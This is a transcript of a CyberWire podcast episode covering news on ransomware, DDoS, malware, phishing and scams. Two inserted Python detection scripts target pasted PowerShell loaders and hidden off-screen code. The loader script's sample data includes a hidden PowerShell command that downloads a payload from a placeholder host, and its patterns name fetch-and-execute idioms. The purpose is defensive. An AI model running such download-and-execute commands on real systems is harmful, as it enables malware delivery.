The CyberWire Daily Podcast 6.20.25
Ep 2333 | 6.20.25

A blast from the breached past.

Transcript

An historic data breach that wasn’t. Aflac says it stopped a ransomware attack. Cloudflare thwarts a record-breaking DDoS attack. Mocha Manakin combines clever social engineering with custom-built malware. The Godfather Android trojan uses a sophisticated virtualization technique to hijack banking and crypto apps. A British expert on Russian information warfare is targeted in a sophisticated spear phishing campaign. A federal judge dismisses a lawsuit against CrowdStrike filed by airline passengers. Banana Squad disguises malicious code as legitimate open-source software. The U.S. Justice Department wants to seize over $225 million in cryptocurrency linked to romance and investment scams. Ben Yelin explains the recent Oversight Committee request for Microsoft to hand over GitHub logs related to alleged DOGE misconduct. This one weird audio trick leaves AI scam calls speechless.

Today is Friday June 20th 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

An historic data breach that wasn’t. 

News broke yesterday about a so-called “historic” data breach—except, it’s not a breach at all. What actually happened is that someone exposed a massive database of stolen credentials online. But here’s the catch: these credentials weren’t freshly stolen. They were scraped from older breaches, infostealer malware logs, and credential stuffing attacks. In other words, this is a giant compilation of already-compromised data—some of it years old.

Cybernews, who found the exposed trove, said the format matched what’s commonly used by infostealer malware. That malware quietly grabs passwords stored in browsers and apps, then ships them off to cybercriminals. These “logs” get traded or dumped on sites like Telegram all the time.

So no, the sky isn’t falling—again. But yes, you should still update your security hygiene.

Aflac says it stopped a ransomware attack. 

Aflac says it stopped a ransomware attack launched by a “sophisticated cybercrime group” on June 12, though some data was stolen before the breach was contained. While the ransomware didn’t disrupt operations, the stolen files may include sensitive personal and health data from customers, employees, and agents. Aflac suspects the hackers used social engineering, possibly impersonating IT staff, to access systems, a tactic linked to Scattered Spider, a group recently targeting insurance firms. Google and cybersecurity experts warn this campaign is ongoing and highly coordinated. Aflac has alerted the SEC, set up a helpline, and is offering identity protection. The company emphasized its ability to continue business as usual. This is the second breach Aflac has faced in two years, following a 2023 incident involving 1.3 million customers in Japan.

Cloudflare thwarts a record-breaking DDoS attack.

Cloudflare recently stopped a massive DDoS attack that peaked at 7.3 Tbps, the largest it has ever seen. The attack hit a hosting provider in mid-May and lasted just 45 seconds but still delivered 37.4 terabytes of traffic. It targeted nearly 22,000 destination ports per second on a single IP. Over 99% of the traffic was from UDP floods, with smaller amounts from other attack types. The assault came from 122,000 IPs spread across 161 countries, highlighting growing threats to core internet infrastructure.

Mocha Manakin combines clever social engineering with custom-built malware. 

A new cyber threat called Mocha Manakin has emerged, combining clever social engineering with custom-built malware. Discovered by Red Canary back in January, it tricks users with fake instructions, like CAPTCHA tests, that get them to copy and run harmful PowerShell commands. These commands download and launch a backdoor named NodeInitRAT, hidden in a zip file with a legitimate node.exe. Once running, NodeInitRAT can collect data, execute commands, and potentially install ransomware. While no ransomware has yet been linked directly, Red Canary sees a strong possibility, citing links to Interlock ransomware. Mocha Manakin hides its traffic using Cloudflare tunnels, making it harder to detect. Red Canary urges organizations to train users, monitor systems, and block suspicious network activity to guard against this evolving and deceptive threat.
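The monitoring Red Canary recommends can start with process-creation telemetry. The script below is an added example, not Red Canary's detection logic or anything from the Mocha Manakin report: it runs three rules over a handful of constructed, Sysmon-style process-creation records (the field names, the user-writable path patterns, and the choice of explorer.exe as the parent of a pasted Run-dialog command are all assumptions for illustration). It flags PowerShell launched from an interactive parent with a fetch-and-execute command line, and node.exe running from a user-writable directory or spawned by PowerShell.

```python
"""Flag process-creation events matching the pasted-PowerShell -> node.exe backdoor pattern.

Added example, not Red Canary's rules. Events are constructed, simplified
process-creation records (Sysmon Event ID 1 style); field names and paths are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the new process
    command_line: str   # command line of the new process


# One-shot fetch-and-execute idioms commonly seen in pasted PowerShell one-liners.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)
# Parents that indicate a human pasted the command (Run dialog is a child of explorer.exe; assumption).
USER_PASTE_PARENTS = {"explorer.exe"}
# User-writable locations where a dropped archive would be unpacked (assumption).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads)\\|\\temp\\", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the rules this event trips (empty list = nothing suspicious)."""
    hits: list[str] = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img in SHELLS and parent in USER_PASTE_PARENTS and DOWNLOAD_EXEC.search(ev.command_line):
        hits.append("pasted_powershell_download_exec")
    if img == "node.exe" and USER_WRITABLE.search(ev.image):
        hits.append("node_from_user_writable_path")
    if img == "node.exe" and parent in SHELLS:
        hits.append("node_spawned_by_powershell")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Return (image, rules) for every event that trips at least one rule."""
    return [(ev.image, classify(ev)) for ev in events if classify(ev)]


# Constructed sample telemetry: two suspicious records and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -c "iwr http://example.invalid/p -OutFile $env:TEMP\p.zip"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\alice\AppData\Local\Temp\node-v20\node.exe", "node.exe init.js"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Program Files\nodejs\node.exe", "node server.js"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-ChildItem"),
]

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

The third rule is the one worth keeping even if the others are tuned away: a legitimate node.exe rarely has a PowerShell parent, while the dropped copy in this campaign is launched by the very one-liner the user pasted.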

The Godfather Android trojan uses a sophisticated virtualization technique to hijack banking and crypto apps. 

A new version of the Godfather Android trojan is using a sophisticated virtualization technique to hijack banking and crypto apps, according to Zimperium. Based on the Anubis trojan, Godfather now sets up a sandbox on infected devices to run real copies of target apps, making it harder to detect. When users open their apps, they’re redirected to virtualized versions controlled by the malware, which captures everything in real time. Godfather uses open-source tools like Xposed and Virtualapp to pull this off, allowing attackers full visibility and control over user interactions. It also alters APK and Android Manifest files to evade detection and uses Android’s accessibility services to trick users into granting permissions. Currently, it’s been used against Turkish banks.

A British expert on Russian information warfare is targeted in a sophisticated spear phishing campaign. 

Keir Giles, a British expert on Russian information warfare, was recently targeted in a sophisticated spear phishing campaign using advanced social engineering. The attacker posed as a U.S. State Department official named “Claudie S. Weber” and invited Giles to a fake consultation. The ploy was convincing, complete with official-sounding emails and cc’d State Department addresses that didn’t actually exist. Backed by a PDF that mimicked government documentation, the attacker asked Giles to generate an app-specific password (ASP) to access a secure platform. In reality, this would have granted them persistent access to his Gmail. Google and Citizen Lab investigated the attack and linked it with “low confidence” to Russian state-sponsored actor APT29. Though Giles didn’t use the targeted email account, he believes attackers may still manipulate stolen data as part of a broader disinformation effort. Researchers say the campaign was unusually patient and adaptive, likely using a large language model to craft replies.

A federal judge dismisses a lawsuit against CrowdStrike filed by airline passengers. 

A federal judge has dismissed a lawsuit against CrowdStrike filed by airline passengers over its 2024 software update that disrupted airline operations. The judge ruled that the claims were preempted by the Airline Deregulation Act (ADA), even though CrowdStrike isn’t an airline. The court found that the disruptions, affecting ticketing, boarding, and scheduling, were directly tied to airline services, which the ADA protects from inconsistent state laws. Plaintiffs accused CrowdStrike of negligence, claiming it failed to test or warn about the update, which crashed critical systems and stranded travelers. While the plaintiffs argued that CrowdStrike shouldn’t benefit from ADA preemption as a third-party vendor, the court disagreed, emphasizing the company’s central role in airline operations. Even claims of stress and physical injury were dismissed as the court maintained the harm stemmed from service disruptions, not direct personal harm. The decision sets a precedent protecting vendors closely tied to airline operations from certain lawsuits.

Banana Squad disguises malicious code as legitimate open-source software. 

Researchers at ReversingLabs have uncovered a new cyber threat led by Banana Squad, a group known for disguising malicious code as legitimate open-source software. The group created over 60 fake repositories on GitHub, posing as Python hacking tools but secretly containing malware designed to steal sensitive data from Windows systems, targeting apps, browsers, and even cryptocurrency wallets. One tactic involves hiding harmful code in long, invisible lines pushed off-screen, making it hard for developers to detect. Banana Squad previously released hundreds of malicious packages, downloaded nearly 75,000 times before removal. Despite a 70% drop in malware across open-source platforms in 2024, threats are evolving. Attackers now use stealthier, more sophisticated methods. Reports also show rising risks from secret leaks and vulnerable code in popular OSS packages.
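The off-screen trick is easy to check for mechanically. The scanner below is an added example, not ReversingLabs' tooling: it reads Python source and reports any line where a long run of spaces or tabs sits between visible code and more code, which is exactly how a line is pushed past the right edge of an editor. The whitespace threshold and the sample file are constructed assumptions; tune the threshold for your code base, and expect the occasional false positive from string literals that legitimately contain long space runs.

```python
"""Report Python source lines that hide code after a long run of whitespace.

Added example, not ReversingLabs' scanner. The sample file is constructed and
WHITESPACE_RUN is an assumed threshold.
"""
import re

WHITESPACE_RUN = 40  # consecutive spaces/tabs that almost never occur in honest code (assumption)
RUN = re.compile(rf"[ \t]{{{WHITESPACE_RUN},}}")


def find_hidden_code(source: str) -> list[tuple[int, str, str]]:
    """Return (line number, visible part, hidden part) for each suspicious line.

    Leading indentation is ignored: the run has to be preceded by visible code
    and followed by more code on the same line.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.rstrip()
        for m in RUN.finditer(stripped):
            before, after = stripped[:m.start()], stripped[m.end():]
            if before.strip() and after:
                findings.append((lineno, before.rstrip(), after))
                break  # one finding per line is enough
    return findings


def report(source: str) -> str:
    """Human-readable summary suitable for a CI log."""
    lines = [f"line {n}: visible '{vis}' hides '{hid}'" for n, vis, hid in find_hidden_code(source)]
    return "\n".join(lines) if lines else "no hidden code found"


# Constructed sample: line 4 looks like a plain print() but carries a second statement
# 200 spaces to the right; the hidden part is a harmless stand-in for a malicious one.
SAMPLE = (
    "import os\n"
    "def greet(name):\n"
    "    return f'hello {name}'\n"
    "print(greet('world'))" + " " * 200 + ";import base64\n"
    "x = 'string with   a few spaces'\n"
)

if __name__ == "__main__":
    print(report(SAMPLE))
```

Run it over a cloned repository before executing anything from it; a single hit on a file that otherwise looks like a small utility is a strong signal to read the full line in a hex viewer rather than an editor.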

The U.S. Justice Department wants to seize over $225 million in cryptocurrency linked to romance and investment scams. 

The U.S. Justice Department is seeking to seize over $225 million in cryptocurrency linked to romance and investment scams run from Vietnam and the Philippines. The funds, traced via blockchain analysis by the FBI and Secret Service, were laundered through hundreds of wallets and thousands of transactions. Over 430 victims across multiple U.S. states were defrauded, often through fake social media connections offering crypto investments. Victims sent millions, only to be locked out of their accounts after being asked for fake “fees” to withdraw funds. The scheme, linked to Vietnamese nationals operating in Philippine “scam compounds,” used fake documents and centralized IP addresses. Exchange OKX and blockchain firm Tether helped track the activity. This marks the largest crypto seizure in U.S. Secret Service history and highlights growing law enforcement capabilities in recovering stolen digital assets amid a broader surge in global crypto scams, which cost victims $5.8 billion last year.

Next up, my Caveat co-host, Ben Yelin, joins me to talk about the recent Oversight Committee request for Microsoft to hand over GitHub logs related to alleged misconduct by Elon Musk’s "Department of Government Efficiency". We’ll be right back.

Welcome back. You can find a link to the article Ben discussed in our show notes. 

This one weird audio trick leaves AI scam calls speechless. 

In a world where AI-powered scammers can sweet-talk their way into your bank account, researchers from Israel and India have decided it’s time to fight fire with… weird noises. Their new tool, ASRJam, is a crafty defense against “vishing” scams, those charming robot calls pretending to be helpful strangers with urgent investment opportunities.

ASRJam uses EchoGuard, a sound-bending algorithm that warps your voice just enough to confuse AI speech recognition, while still letting humans understand you. It’s like mumbling in just the right frequency to fluster a robot but not your grandma.

This defense works in real time, invisibly, and unlike previous efforts, it’s subtle—not the audio equivalent of nails on a chalkboard. Against most AI models (including OpenAI’s Whisper), it’s highly effective at scrambling scammer bots mid-chat. The researchers call it “pleasantly disruptive.” Let’s hope scam artists hate it as much as we love the idea of giving them a taste of their own digital medicine.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

We'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your insights until August 31, 2025. There's a link in the show notes.

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.